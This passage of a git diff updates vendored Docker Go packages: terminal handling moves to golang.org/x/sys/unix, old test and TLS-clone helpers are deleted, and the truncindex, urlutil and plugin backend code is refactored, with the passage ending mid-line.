newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/termios_linux.go b/vendor/github.com/docker/docker/pkg/term/termios_linux.go index 22921b6aef..6d4c63fdb7 100644 --- a/vendor/github.com/docker/docker/pkg/term/termios_linux.go +++ b/vendor/github.com/docker/docker/pkg/term/termios_linux.go @@ -1,46 +1,38 @@ -// +build !cgo - -package term +package term // import "github.com/docker/docker/pkg/term" import ( - "syscall" - "unsafe" + "golang.org/x/sys/unix" ) const ( - getTermios = syscall.TCGETS - setTermios = syscall.TCSETS + getTermios = unix.TCGETS + setTermios = unix.TCSETS ) // Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} +type Termios unix.Termios // MakeRaw put the terminal connected to the given file descriptor into raw // mode and returns the previous state of the terminal so that it can be // restored. func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, getTermios, uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { + termios, err := unix.IoctlGetTermios(int(fd), getTermios) + if err != nil { return nil, err } - newState := oldState.termios + var oldState State + oldState.termios = Termios(*termios) - newState.Iflag &^= (syscall.IGNBRK | syscall.BRKINT | syscall.PARMRK | syscall.ISTRIP | syscall.INLCR | syscall.IGNCR | syscall.ICRNL | syscall.IXON) - newState.Oflag &^= syscall.OPOST - newState.Lflag &^= (syscall.ECHO | syscall.ECHONL | syscall.ICANON | syscall.ISIG | syscall.IEXTEN) - newState.Cflag &^= (syscall.CSIZE | syscall.PARENB) - newState.Cflag |= syscall.CS8 + termios.Iflag &^= (unix.IGNBRK | unix.BRKINT | unix.PARMRK | unix.ISTRIP | unix.INLCR | unix.IGNCR | unix.ICRNL | unix.IXON) + termios.Oflag &^= unix.OPOST + termios.Lflag &^= (unix.ECHO | unix.ECHONL | unix.ICANON | unix.ISIG | unix.IEXTEN) + termios.Cflag &^= (unix.CSIZE | unix.PARENB) + termios.Cflag |= unix.CS8 + termios.Cc[unix.VMIN] = 1 + termios.Cc[unix.VTIME] = 0 - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, setTermios, uintptr(unsafe.Pointer(&newState))); err != 0 { + if err := unix.IoctlSetTermios(int(fd), setTermios, termios); err != nil { return nil, err } return &oldState, nil diff --git a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go b/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go deleted file mode 100644 index ed843ad69c..0000000000 --- a/vendor/github.com/docker/docker/pkg/term/termios_openbsd.go +++ /dev/null @@ -1,69 +0,0 @@ -package term - -import ( - "syscall" - "unsafe" -) - -const ( - getTermios = syscall.TIOCGETA - setTermios = syscall.TIOCSETA -) - -// Termios magic numbers, passthrough to the ones defined in syscall. -const ( - IGNBRK = syscall.IGNBRK - PARMRK = syscall.PARMRK - INLCR = syscall.INLCR - IGNCR = syscall.IGNCR - ECHONL = syscall.ECHONL - CSIZE = syscall.CSIZE - ICRNL = syscall.ICRNL - ISTRIP = syscall.ISTRIP - PARENB = syscall.PARENB - ECHO = syscall.ECHO - ICANON = syscall.ICANON - ISIG = syscall.ISIG - IXON = syscall.IXON - BRKINT = syscall.BRKINT - INPCK = syscall.INPCK - OPOST = syscall.OPOST - CS8 = syscall.CS8 - IEXTEN = syscall.IEXTEN -) - -// Termios is the Unix API for terminal I/O. -type Termios struct { - Iflag uint32 - Oflag uint32 - Cflag uint32 - Lflag uint32 - Cc [20]byte - Ispeed uint32 - Ospeed uint32 -} - -// MakeRaw put the terminal connected to the given file descriptor into raw -// mode and returns the previous state of the terminal so that it can be -// restored. -func MakeRaw(fd uintptr) (*State, error) { - var oldState State - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(getTermios), uintptr(unsafe.Pointer(&oldState.termios))); err != 0 { - return nil, err - } - - newState := oldState.termios - newState.Iflag &^= (IGNBRK | BRKINT | PARMRK | ISTRIP | INLCR | IGNCR | ICRNL | IXON) - newState.Oflag &^= OPOST - newState.Lflag &^= (ECHO | ECHONL | ICANON | ISIG | IEXTEN) - newState.Cflag &^= (CSIZE | PARENB) - newState.Cflag |= CS8 - newState.Cc[syscall.VMIN] = 1 - newState.Cc[syscall.VTIME] = 0 - - if _, _, err := syscall.Syscall(syscall.SYS_IOCTL, fd, uintptr(setTermios), uintptr(unsafe.Pointer(&newState))); err != 0 { - return nil, err - } - - return &oldState, nil -} diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go index cb0b88356d..1d7c452cc8 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_reader.go @@ -1,6 +1,6 @@ // +build windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "bytes" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go index a3ce5697d9..7799a03fc5 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/ansi_writer.go @@ -1,6 +1,6 @@ // +build windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "io" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/console.go b/vendor/github.com/docker/docker/pkg/term/windows/console.go index ca5c3b2e53..5274019758 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/console.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/console.go @@ -1,6 +1,6 @@ // +build windows -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "os" diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows.go b/vendor/github.com/docker/docker/pkg/term/windows/windows.go index ce4cb5990e..3e5593ca6a 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/windows.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows.go @@ -2,15 +2,15 @@ // When asked for the set of standard streams (e.g., stdin, stdout, stderr), the code will create // and return pseudo-streams that convert ANSI sequences to / from Windows Console API calls. -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" import ( "io/ioutil" "os" "sync" - ansiterm "github.com/Azure/go-ansiterm" - "github.com/Sirupsen/logrus" + "github.com/Azure/go-ansiterm" + "github.com/sirupsen/logrus" ) var logger *logrus.Logger diff --git a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go index 52aeab54ec..80cda601fa 100644 --- a/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go +++ b/vendor/github.com/docker/docker/pkg/term/windows/windows_test.go @@ -1,3 +1,3 @@ // This file is necessary to pass the Docker tests. -package windows +package windowsconsole // import "github.com/docker/docker/pkg/term/windows" diff --git a/vendor/github.com/docker/docker/pkg/term/winsize.go b/vendor/github.com/docker/docker/pkg/term/winsize.go new file mode 100644 index 0000000000..a19663ad83 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/term/winsize.go @@ -0,0 +1,20 @@ +// +build !windows + +package term // import "github.com/docker/docker/pkg/term" + +import ( + "golang.org/x/sys/unix" +) + +// GetWinsize returns the window size based on the specified file descriptor. +func GetWinsize(fd uintptr) (*Winsize, error) { + uws, err := unix.IoctlGetWinsize(int(fd), unix.TIOCGWINSZ) + ws := &Winsize{Height: uws.Row, Width: uws.Col, x: uws.Xpixel, y: uws.Ypixel} + return ws, err +} + +// SetWinsize tries to set the specified window size for the specified file descriptor. +func SetWinsize(fd uintptr, ws *Winsize) error { + uws := &unix.Winsize{Row: ws.Height, Col: ws.Width, Xpixel: ws.x, Ypixel: ws.y} + return unix.IoctlSetWinsize(int(fd), unix.TIOCSWINSZ, uws) +} diff --git a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go b/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go deleted file mode 100644 index 6da8518a5e..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/assert/assert.go +++ /dev/null @@ -1,97 +0,0 @@ -// Package assert contains functions for making assertions in unit tests -package assert - -import ( - "fmt" - "path/filepath" - "reflect" - "runtime" - "strings" - - "github.com/davecgh/go-spew/spew" -) - -// TestingT is an interface which defines the methods of testing.T that are -// required by this package -type TestingT interface { - Fatalf(string, ...interface{}) -} - -// Equal compare the actual value to the expected value and fails the test if -// they are not equal. -func Equal(t TestingT, actual, expected interface{}) { - if expected != actual { - fatal(t, "Expected '%v' (%T) got '%v' (%T)", expected, expected, actual, actual) - } -} - -//EqualStringSlice compares two slices and fails the test if they do not contain -// the same items. -func EqualStringSlice(t TestingT, actual, expected []string) { - if len(actual) != len(expected) { - fatal(t, "Expected (length %d): %q\nActual (length %d): %q", - len(expected), expected, len(actual), actual) - } - for i, item := range actual { - if item != expected[i] { - fatal(t, "Slices differ at element %d, expected %q got %q", - i, expected[i], item) - } - } -} - -// NilError asserts that the error is nil, otherwise it fails the test. -func NilError(t TestingT, err error) { - if err != nil { - fatal(t, "Expected no error, got: %s", err.Error()) - } -} - -// DeepEqual compare the actual value to the expected value and fails the test if -// they are not "deeply equal". -func DeepEqual(t TestingT, actual, expected interface{}) { - if !reflect.DeepEqual(actual, expected) { - fatal(t, "Expected (%T):\n%v\n\ngot (%T):\n%s\n", - expected, spew.Sdump(expected), actual, spew.Sdump(actual)) - } -} - -// Error asserts that error is not nil, and contains the expected text, -// otherwise it fails the test. -func Error(t TestingT, err error, contains string) { - if err == nil { - fatal(t, "Expected an error, but error was nil") - } - - if !strings.Contains(err.Error(), contains) { - fatal(t, "Expected error to contain '%s', got '%s'", contains, err.Error()) - } -} - -// Contains asserts that the string contains a substring, otherwise it fails the -// test. -func Contains(t TestingT, actual, contains string) { - if !strings.Contains(actual, contains) { - fatal(t, "Expected '%s' to contain '%s'", actual, contains) - } -} - -// NotNil fails the test if the object is nil -func NotNil(t TestingT, obj interface{}) { - if obj == nil { - fatal(t, "Expected non-nil value.") - } -} - -func fatal(t TestingT, format string, args ...interface{}) { - t.Fatalf(errorSource()+format, args...) -} - -// See testing.decorate() -func errorSource() string { - _, filename, line, ok := runtime.Caller(3) - if !ok { - return "" - } - return fmt.Sprintf("%s:%d: ", filepath.Base(filename), line) -} diff --git a/vendor/github.com/docker/docker/pkg/testutil/pkg.go b/vendor/github.com/docker/docker/pkg/testutil/pkg.go deleted file mode 100644 index 110b2e6a79..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/pkg.go +++ /dev/null @@ -1 +0,0 @@ -package testutil diff --git a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go b/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go deleted file mode 100644 index 0e09d99dae..0000000000 --- a/vendor/github.com/docker/docker/pkg/testutil/tempfile/tempfile.go +++ /dev/null @@ -1,36 +0,0 @@ -package tempfile - -import ( - "io/ioutil" - "os" - - "github.com/docker/docker/pkg/testutil/assert" -) - -// TempFile is a temporary file that can be used with unit tests. TempFile -// reduces the boilerplate setup required in each test case by handling -// setup errors. -type TempFile struct { - File *os.File -} - -// NewTempFile returns a new temp file with contents -func NewTempFile(t assert.TestingT, prefix string, content string) *TempFile { - file, err := ioutil.TempFile("", prefix+"-") - assert.NilError(t, err) - - _, err = file.Write([]byte(content)) - assert.NilError(t, err) - file.Close() - return &TempFile{File: file} -} - -// Name returns the filename -func (f *TempFile) Name() string { - return f.File.Name() -} - -// Remove removes the file -func (f *TempFile) Remove() { - os.Remove(f.Name()) -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go deleted file mode 100644 index e4dec3a5d1..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone.go +++ /dev/null @@ -1,11 +0,0 @@ -// +build go1.8 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.7 that doesn't include this method in stdlib. -func Clone(c *tls.Config) *tls.Config { - return c.Clone() -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go deleted file mode 100644 index 0b816650ec..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go16.go +++ /dev/null @@ -1,31 +0,0 @@ -// +build go1.6,!go1.7 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.6 that doesn't include this method in stdlib. -func Clone(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - } -} diff --git a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go b/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go deleted file mode 100644 index 0d5b448fec..0000000000 --- a/vendor/github.com/docker/docker/pkg/tlsconfig/tlsconfig_clone_go17.go +++ /dev/null @@ -1,33 +0,0 @@ -// +build go1.7,!go1.8 - -package tlsconfig - -import "crypto/tls" - -// Clone returns a clone of tls.Config. This function is provided for -// compatibility for go1.7 that doesn't include this method in stdlib. -func Clone(c *tls.Config) *tls.Config { - return &tls.Config{ - Rand: c.Rand, - Time: c.Time, - Certificates: c.Certificates, - NameToCertificate: c.NameToCertificate, - GetCertificate: c.GetCertificate, - RootCAs: c.RootCAs, - NextProtos: c.NextProtos, - ServerName: c.ServerName, - ClientAuth: c.ClientAuth, - ClientCAs: c.ClientCAs, - InsecureSkipVerify: c.InsecureSkipVerify, - CipherSuites: c.CipherSuites, - PreferServerCipherSuites: c.PreferServerCipherSuites, - SessionTicketsDisabled: c.SessionTicketsDisabled, - SessionTicketKey: c.SessionTicketKey, - ClientSessionCache: c.ClientSessionCache, - MinVersion: c.MinVersion, - MaxVersion: c.MaxVersion, - CurvePreferences: c.CurvePreferences, - DynamicRecordSizingDisabled: c.DynamicRecordSizingDisabled, - Renegotiation: c.Renegotiation, - } -} diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go index 02610b8b7e..d5c840cf13 100644 --- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex.go @@ -1,7 +1,7 @@ // Package truncindex provides a general 'index tree', used by Docker // in order to be able to reference containers by only a few unambiguous // characters of their id. -package truncindex +package truncindex // import "github.com/docker/docker/pkg/truncindex" import ( "errors" @@ -77,10 +77,7 @@ func (idx *TruncIndex) addID(id string) error { func (idx *TruncIndex) Add(id string) error { idx.Lock() defer idx.Unlock() - if err := idx.addID(id); err != nil { - return err - } - return nil + return idx.addID(id) } // Delete removes an ID from the TruncIndex. If there are multiple IDs @@ -128,8 +125,13 @@ func (idx *TruncIndex) Get(s string) (string, error) { return "", ErrNotExist } -// Iterate iterates over all stored IDs, and passes each of them to the given handler. +// Iterate iterates over all stored IDs and passes each of them to the given +// handler. Take care that the handler method does not call any public +// method on truncindex as the internal locking is not reentrant/recursive +// and will result in deadlock. func (idx *TruncIndex) Iterate(handler func(id string)) { + idx.Lock() + defer idx.Unlock() idx.trie.Visit(func(prefix patricia.Prefix, item patricia.Item) error { handler(string(prefix)) return nil diff --git a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go index 8197baf7d4..e259017982 100644 --- a/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go +++ b/vendor/github.com/docker/docker/pkg/truncindex/truncindex_test.go @@ -1,15 +1,16 @@ -package truncindex +package truncindex // import "github.com/docker/docker/pkg/truncindex" import ( "math/rand" "testing" + "time" "github.com/docker/docker/pkg/stringid" ) // Test the behavior of TruncIndex, an index for querying IDs from a non-conflicting prefix. func TestTruncIndex(t *testing.T) { - ids := []string{} + var ids []string index := NewTruncIndex(ids) // Get on an empty index if _, err := index.Get("foobar"); err == nil { @@ -98,6 +99,7 @@ func TestTruncIndex(t *testing.T) { assertIndexGet(t, index, id, id, false) assertIndexIterate(t) + assertIndexIterateDoNotPanic(t) } func assertIndexIterate(t *testing.T) { @@ -121,6 +123,28 @@ func assertIndexIterate(t *testing.T) { }) } +func assertIndexIterateDoNotPanic(t *testing.T) { + ids := []string{ + "19b36c2c326ccc11e726eee6ee78a0baf166ef96", + "28b36c2c326ccc11e726eee6ee78a0baf166ef96", + } + + index := NewTruncIndex(ids) + iterationStarted := make(chan bool, 1) + + go func() { + <-iterationStarted + index.Delete("19b36c2c326ccc11e726eee6ee78a0baf166ef96") + }() + + index.Iterate(func(targetId string) { + if targetId == "19b36c2c326ccc11e726eee6ee78a0baf166ef96" { + iterationStarted <- true + time.Sleep(100 * time.Millisecond) + } + }) +} + func assertIndexGet(t *testing.T, index *TruncIndex, input, expectedResult string, expectError bool) { if result, err := index.Get(input); err != nil && !expectError { t.Fatalf("Unexpected error getting '%s': %s", input, err) diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go index 44152873b1..9cf348c723 100644 --- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil.go @@ -1,6 +1,6 @@ // Package urlutil provides helper function to check urls kind. // It supports http urls, git urls and transport url (tcp://, …) -package urlutil +package urlutil // import "github.com/docker/docker/pkg/urlutil" import ( "regexp" @@ -9,7 +9,15 @@ import ( var ( validPrefixes = map[string][]string{ - "url": {"http://", "https://"}, + "url": {"http://", "https://"}, + + // The github.com/ prefix is a special case used to treat context-paths + // starting with `github.com` as a git URL if the given path does not + // exist locally. The "github.com/" prefix is kept for backward compatibility, + // and is a legacy feature. + // + // Going forward, no additional prefixes should be added, and users should + // be encouraged to use explicit URLs (https://github.com/user/repo.git) instead. "git": {"git://", "github.com/", "git@"}, "transport": {"tcp://", "tcp+tls://", "udp://", "unix://", "unixgram://"}, } @@ -29,12 +37,6 @@ func IsGitURL(str string) bool { return checkURL(str, "git") } -// IsGitTransport returns true if the provided str is a git transport by inspecting -// the prefix of the string for known protocols used in git. -func IsGitTransport(str string) bool { - return IsURL(str) || strings.HasPrefix(str, "git://") || strings.HasPrefix(str, "git@") -} - // IsTransportURL returns true if the provided str is a transport (tcp, tcp+tls, udp, unix) URL. func IsTransportURL(str string) bool { return checkURL(str, "transport") diff --git a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go index 75eb464fe5..6660368316 100644 --- a/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go +++ b/vendor/github.com/docker/docker/pkg/urlutil/urlutil_test.go @@ -1,4 +1,4 @@ -package urlutil +package urlutil // import "github.com/docker/docker/pkg/urlutil" import "testing" @@ -27,35 +27,21 @@ var ( } ) -func TestValidGitTransport(t *testing.T) { - for _, url := range gitUrls { - if IsGitTransport(url) == false { - t.Fatalf("%q should be detected as valid Git prefix", url) - } - } - - for _, url := range incompleteGitUrls { - if IsGitTransport(url) == true { - t.Fatalf("%q should not be detected as valid Git prefix", url) - } - } -} - func TestIsGIT(t *testing.T) { for _, url := range gitUrls { - if IsGitURL(url) == false { + if !IsGitURL(url) { t.Fatalf("%q should be detected as valid Git url", url) } } for _, url := range incompleteGitUrls { - if IsGitURL(url) == false { + if !IsGitURL(url) { t.Fatalf("%q should be detected as valid Git url", url) } } for _, url := range invalidGitUrls { - if IsGitURL(url) == true { + if IsGitURL(url) { t.Fatalf("%q should not be detected as valid Git prefix", url) } } @@ -63,7 +49,7 @@ func TestIsGIT(t *testing.T) { func TestIsTransport(t *testing.T) { for _, url := range transportUrls { - if IsTransportURL(url) == false { + if !IsTransportURL(url) { t.Fatalf("%q should be detected as valid Transport url", url) } } diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent.go b/vendor/github.com/docker/docker/pkg/useragent/useragent.go index 1137db51b8..22db82129b 100644 --- a/vendor/github.com/docker/docker/pkg/useragent/useragent.go +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent.go @@ -1,6 +1,6 @@ // Package useragent provides helper functions to pack // version information into a single User-Agent header. -package useragent +package useragent // import "github.com/docker/docker/pkg/useragent" import ( "strings" diff --git a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go index 0ad7243a6d..76868dc852 100644 --- a/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go +++ b/vendor/github.com/docker/docker/pkg/useragent/useragent_test.go @@ -1,4 +1,4 @@ -package useragent +package useragent // import "github.com/docker/docker/pkg/useragent" import "testing" diff --git a/vendor/github.com/docker/docker/plugin/backend_linux.go b/vendor/github.com/docker/docker/plugin/backend_linux.go index 33200d8efa..044e14b0cb 100644 --- a/vendor/github.com/docker/docker/plugin/backend_linux.go +++ b/vendor/github.com/docker/docker/plugin/backend_linux.go @@ -1,40 +1,49 @@ -// +build linux - -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "archive/tar" "compress/gzip" + "context" "encoding/json" - "fmt" "io" "io/ioutil" "net/http" "os" "path" "path/filepath" - "sort" + "runtime" "strings" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" "github.com/docker/docker/distribution" progressutils "github.com/docker/docker/distribution/utils" "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/errdefs" "github.com/docker/docker/image" "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/chrootarchive" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/system" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" "github.com/pkg/errors" - "golang.org/x/net/context" + "github.com/sirupsen/logrus" ) +var acceptedPluginFilterTags = map[string]bool{ + "enabled": true, + "capability": true, +} + // Disable deactivates a plugin. This means resources (volumes, networks) cant use them. func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) error { p, err := pm.config.Store.GetV2Plugin(refOrID) @@ -46,12 +55,19 @@ func (pm *Manager) Disable(refOrID string, config *types.PluginDisableConfig) er pm.mu.RUnlock() if !config.ForceDisable && p.GetRefCount() > 0 { - return fmt.Errorf("plugin %s is in use", p.Name()) + return errors.WithStack(inUseError(p.Name())) + } + + for _, typ := range p.GetTypes() { + if typ.Capability == authorization.AuthZApiImplements { + pm.config.AuthzMiddleware.RemovePlugin(p.Name()) + } } if err := pm.disable(p, c); err != nil { return err } + pm.publisher.Publish(EventDisable{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.GetID(), refOrID, "disable") return nil } @@ -67,6 +83,7 @@ func (pm *Manager) Enable(refOrID string, config *types.PluginEnableConfig) erro if err := pm.enable(p, c, false); err != nil { return err } + pm.publisher.Publish(EventEnable{Plugin: p.PluginObj}) pm.config.LogPluginEvent(p.GetID(), refOrID, "enable") return nil } @@ -125,7 +142,7 @@ func (s *tempConfigStore) Put(c []byte) (digest.Digest, error) { func (s *tempConfigStore) Get(d digest.Digest) ([]byte, error) { if d != s.configDigest { - return nil, digest.ErrDigestNotFound + return nil, errNotFound("digest not found") } return s.config, nil } @@ -134,7 +151,12 @@ func (s *tempConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { return configToRootFS(c) } -func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { +func (s *tempConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) { + // TODO: LCOW/Plugins. This will need revisiting. For now use the runtime OS + return &specs.Platform{OS: runtime.GOOS}, nil +} + +func computePrivileges(c types.PluginConfig) types.PluginPrivileges { var privileges types.PluginPrivileges if c.Network.Type != "null" && c.Network.Type != "bridge" && c.Network.Type != "" { privileges = append(privileges, types.PluginPrivilege{ @@ -143,6 +165,20 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { Value: []string{c.Network.Type}, }) } + if c.IpcHost { + privileges = append(privileges, types.PluginPrivilege{ + Name: "host ipc namespace", + Description: "allow access to host ipc namespace", + Value: []string{"true"}, + }) + } + if c.PidHost { + privileges = append(privileges, types.PluginPrivilege{ + Name: "host pid namespace", + Description: "allow access to host pid namespace", + Value: []string{"true"}, + }) + } for _, mount := range c.Mounts { if mount.Source != nil { privileges = append(privileges, types.PluginPrivilege{ @@ -176,7 +212,7 @@ func computePrivileges(c types.PluginConfig) (types.PluginPrivileges, error) { }) } - return privileges, nil + return privileges } // Privileges pulls a plugin config and computes the privileges required to install it. @@ -205,34 +241,35 @@ func (pm *Manager) Privileges(ctx context.Context, ref reference.Named, metaHead } var config types.PluginConfig if err := json.Unmarshal(cs.config, &config); err != nil { - return nil, err + return nil, errdefs.System(err) } - return computePrivileges(config) + return computePrivileges(config), nil } // Upgrade upgrades a plugin func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { p, err := pm.config.Store.GetV2Plugin(name) if err != nil { - return errors.Wrap(err, "plugin must be installed before upgrading") + return err } if p.IsEnabled() { - return fmt.Errorf("plugin must be disabled before upgrading") + return errors.Wrap(enabledError(p.Name()), "plugin must be disabled before upgrading") } pm.muGC.RLock() defer pm.muGC.RUnlock() // revalidate because Pull is public - nameref, err := reference.ParseNamed(name) - if err != nil { - return errors.Wrapf(err, "failed to parse %q", name) + if _, err := reference.ParseNormalizedNamed(name); err != nil { + return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name) } - name = reference.WithDefaultTag(nameref).String() tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + if err != nil { + return errors.Wrap(errdefs.System(err), "error preparing upgrade") + } defer os.RemoveAll(tmpRootFSDir) dm := &downloadManager{ @@ -266,22 +303,25 @@ func (pm *Manager) Upgrade(ctx context.Context, ref reference.Named, name string } // Pull pulls a plugin, check if the correct privileges are provided and install the plugin. -func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer) (err error) { +func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, metaHeader http.Header, authConfig *types.AuthConfig, privileges types.PluginPrivileges, outStream io.Writer, opts ...CreateOpt) (err error) { pm.muGC.RLock() defer pm.muGC.RUnlock() // revalidate because Pull is public - nameref, err := reference.ParseNamed(name) + nameref, err := reference.ParseNormalizedNamed(name) if err != nil { - return errors.Wrapf(err, "failed to parse %q", name) + return errors.Wrapf(errdefs.InvalidParameter(err), "failed to parse %q", name) } - name = reference.WithDefaultTag(nameref).String() + name = reference.FamiliarString(reference.TagNameOnly(nameref)) if err := pm.config.Store.validateName(name); err != nil { - return err + return errdefs.InvalidParameter(err) } tmpRootFSDir, err := ioutil.TempDir(pm.tmpDir(), ".rootfs") + if err != nil { + return errors.Wrap(errdefs.System(err), "error preparing pull") + } defer os.RemoveAll(tmpRootFSDir) dm := &downloadManager{ @@ -307,20 +347,58 @@ func (pm *Manager) Pull(ctx context.Context, ref reference.Named, name string, m return err } - p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges) + refOpt := func(p *v2.Plugin) { + p.PluginObj.PluginReference = ref.String() + } + optsList := make([]CreateOpt, 0, len(opts)+1) + optsList = append(optsList, opts...) + optsList = append(optsList, refOpt) + + p, err := pm.createPlugin(name, dm.configDigest, dm.blobs, tmpRootFSDir, &privileges, optsList...) if err != nil { return err } - p.PluginObj.PluginReference = ref.String() + pm.publisher.Publish(EventCreate{Plugin: p.PluginObj}) return nil } // List displays the list of plugins and associated metadata. -func (pm *Manager) List() ([]types.Plugin, error) { +func (pm *Manager) List(pluginFilters filters.Args) ([]types.Plugin, error) { + if err := pluginFilters.Validate(acceptedPluginFilterTags); err != nil { + return nil, err + } + + enabledOnly := false + disabledOnly := false + if pluginFilters.Contains("enabled") { + if pluginFilters.ExactMatch("enabled", "true") { + enabledOnly = true + } else if pluginFilters.ExactMatch("enabled", "false") { + disabledOnly = true + } else { + return nil, invalidFilter{"enabled", pluginFilters.Get("enabled")} + } + } + plugins := pm.config.Store.GetAll() out := make([]types.Plugin, 0, len(plugins)) + +next: for _, p := range plugins { + if 